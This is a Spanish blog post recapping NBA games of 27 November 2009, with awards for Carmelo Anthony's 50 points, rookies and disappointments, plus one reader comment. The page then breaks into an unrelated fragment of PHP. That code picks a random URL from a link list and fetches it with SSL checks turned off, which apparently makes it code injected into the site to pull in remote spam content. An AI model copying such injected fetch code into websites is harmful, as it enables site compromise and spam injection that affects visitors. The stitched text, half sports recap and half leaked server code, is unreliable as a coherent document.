La MiniCrónica (27/11/2009)

28 de November de 2009 por Viva_Dirk

Noche de viernes en la NBA quiere decir partidos para todos los gustos, y algo que nos gusta especialmente es ver más de 250 puntos en un partido sin prórrogas. Estaban por medios los Knicks y otros que les va la marcha como los Nuggets. Carmelo se fue hasta los 50 puntos, Al Harrington hasta 41 y la victoria para Denver.

En el lado opuesto victoria de San Antonio ante Houston con un marcador corto, Duncan ‘un dia más en la oficina’ y el resto acompañando al jefe. Antes de eso los Bobcats habian tumbado a los Cavs con un Lebron humano y Gerald Wallace saliéndose. Los Wizards con la vuelta de Jamison consiguieron su 2ª victoria consecutiva antes los Heat donde Wade hizo un mal partido.

Los Hawks no sudaron mucho para ganar a unos Sixers que estan pendientes del posible regreso de Allen Iverson. También de forma cómoda se llevó Boston el partido ante Toronto en otro mal encuentro de Jose Calderon. Partidazo de Baron Davis para que los Clippers ganaran a los Pistons que no pudieron contar con Ben Gordon y partido sin historia en el Conseco donde los Mavs se llevaron un victoria por 21 puntos.En un duelo de jóvenes los Thunders pasaron por encima de los Bucks con Durant en plan MVP y Westbrook de escudero. Phoenix no tuvo ningun problema con los Wolves, Sacramento aumentó la racha perdedora de los Nets, y Memphis sorprendió a los Blazers con un Marc Gasol titánico y un buen partido de Tinsley.

PREMIOS

MVP: Hoy no tenemos dudas. Pese a los méritos de Gerald Wallace, Baron Davis o Kevin Durant, el premio va para Carmelo Anthony que se cascó 50 puntos, 6 rebotes, 5 asistencias y un 60% en tiros de campo frente a los Knicks.

Rookie: Tyreke Evans sigue empeñado en que le tengamos en cuenta, 21 puntos y 8 rebotes nos dejó anoche. No podemos dejar de destacar los 9 puntos, 6 rebotes y 3 tapones de Thabeet en 18 minutos. El premio se lo damos a Jonas Jerebko que fue el mejor de los Pistons con 22 puntos, 5 rebotes y 4 de 4 en triples.

Sorpresa: Hemos tenido un dejavú cuando hemos visto los 16 rebotes que ha conseguido “Big” Ben Wallace, diez de ellos ofensivos. Kris Humphries ha encontrado un hueco en Dallas, ayer en 22 minutos anotó 12 puntos y capturó 11 rebotes.

Decepción: No es que esperemos mucho de él, pero 0 puntos, con 0 de 3 en tiros y tantas pérdidas como asistencias en 23 minutos de juego es decepcionante incluso para Steve Blake. Del que si esperamos grandes cosas es de Wade, que anoche vio como su equipo perdia en casa frente a los Wizars con 18 puntos, 4 pérdidas y un 6 de 19 en tiros por su parte.

MEV: Tampoco hay mucho que añadir ante los 41 puntos y 10 rebotes que dejó Al Harrington ante los Nuggets. Se queda cerca Brandon Roy con sus 26 puntos, 8 rebotes y 9 asistencias.

Comenta

Un comentario a esta entrada

  1. rojorob dice:
    #1

    La verdad es que como lean alguna vez este blog en Portland nos van a dar el premio a “Oregonianos del año” por nuestra simpatía hacia el dúo Blake/McMillan.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>